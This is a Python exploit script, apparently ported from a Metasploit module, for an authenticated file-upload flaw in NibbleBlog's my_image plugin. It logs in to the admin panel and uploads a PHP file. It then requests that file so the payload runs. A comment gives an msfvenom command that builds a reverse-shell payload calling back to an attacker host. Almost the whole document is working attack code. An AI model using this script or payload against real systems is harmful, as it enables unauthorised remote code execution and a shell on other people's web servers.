#!/usr/bin/python # # Your PHP Payload goes into local file nibble.txt # msfvenom -p php/reverse_perl --format raw -o nibble.txt LHOST=ATTACKER LPORT=ATTACKER # # Loosely ported from the NibbleBlog File Upload MSF Module # # Twitter: @a7kemc73 # import requests DEBUG=1 nibbleUsername = "" nibblePassword = "" nibbleURL = "http://127.0.0.1/nibbleblog/" loginURL = nibbleURL + "admin.php" uploadURL = nibbleURL + "admin.php?controller=plugins&action=config&plugin=my_image" exploitURL = nibbleURL + "content/private/plugins/my_image/image.php" body='";' with open('nibble.txt', 'r') as payload: body=body + payload.read() body=body + 'echo "Check for shell!"; ?>' with requests.Session() as web: # Getting login session and cookies loginGetResp = web.get(loginURL) loginPostResp = web.post(loginURL, data={'username':nibbleUsername,'password':nibblePassword}) if DEBUG > 0: print '[-] LOGIN RESPONSE: ' + str(loginPostResp.status_code) + " " + str(loginPostResp.reason) if DEBUG > 1: print '\n' + loginPostResp.text if 'Incorrect username or password.' in loginPostResp.text: print '[!] Login Failed.' else: # Performing File Upload print '[+] Login Successful.' uploadPostResp = web.post(uploadURL, data={'plugin':'my_image','title':'My image','position':'4','caption':'He4dTr1p','image_resize':'1','image_width':'230','image_height':'200','image_option':'auto'}, files={'image': ('nibbles.php', body, 'application/x-php')}, timeout=30) if DEBUG > 0: if 'Warning' in uploadPostResp.text: print '[-] Upload likely successful.' else: print '[-] Upload likely failed.' if DEBUG > 0: print '[-] UPLOAD RESPONSE: ' + str(uploadPostResp.status_code) + ' ' + str(uploadPostResp.reason) if DEBUG > 1: print '\n' + uploadPostResp.text # Executing Upload exploitResp = web.get(exploitURL) if exploitResp.status_code == 200: print '[+] Exploit launched, check for shell.' else: print '[!] Exploit failed.' if DEBUG > 0: print '[-] EXPLOIT RESPONSE: ' + str(exploitResp.status_code) + ' ' + str(exploitResp.reason) if DEBUG > 1: print '\n' + exploitResp.text